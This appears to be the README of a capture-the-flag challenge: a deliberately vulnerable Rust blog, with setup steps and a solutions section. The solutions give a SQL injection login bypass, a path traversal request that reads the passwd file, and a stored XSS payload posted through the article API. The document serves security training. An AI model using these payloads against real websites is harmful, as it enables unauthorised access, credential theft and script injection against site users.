This is a dummy website meant to be a CTF target.
A friend of yours who is learning web development asked you to help him test his simple blog website. You discover that there are security vulnerabilities in his website.
To complete the challenge, you have to:
- Log in as
admin
(easy) - Get the admin password (medium)
- (Require 2) Publish an article which popup something when a user accesses the home page (hard)
- Clone the repository
- Create a
passwd
file and fill it with some password (make sure there is no whitespace after the text) - Create a SQLite database in the server directory (either name it
db.sqlite
or change the name inRocket.toml
), and run the following query on it:
CREATE TABLE "users" (
"username" TEXT NOT NULL UNIQUE,
"password" TEXT NOT NULL,
PRIMARY KEY("username")
)
- Start the web server with
cargo run --release
- Go to http://localhost:8080/sign and register the
admin
user with the same password as inpasswd
- Log out and you are ready to go !
โ ๏ธ This section contains the solutions to the challenge. Take care not to read it if you want to do the challenge yourself !
The login form is vulnerable to SQL injection. So you can log in with something like:
Username: admin';--
Password: admin
The admin password is located in the passwd
file.
The GET /article?file
endpoint is vulnerable to path traversal.
So you can get the file by requesting:
GET /article?file=../../passwd
The POST /api/article
endpoint is vulnerable to DOM injection, but we need a Basic authentication scheme to use the request.
So you can create an article by requesting:
POST /api/article
Authorization: Basic <auth>
Content-Type: application/json
{
"file": "vulnerable",
"title": "<iframe src=\"javascript:alert('I am vulnerable')\">",
"content": ""
}
where <auth>
is the base64 representation of the string admin:<passwd>
(<passwd>
is the text you obtained in the previous task).
You can convert a string into base64 using JavaScript's
btoa
function for example.
Now, whenever a user goes to the home page, an alert saying I am vulnerable
pops up.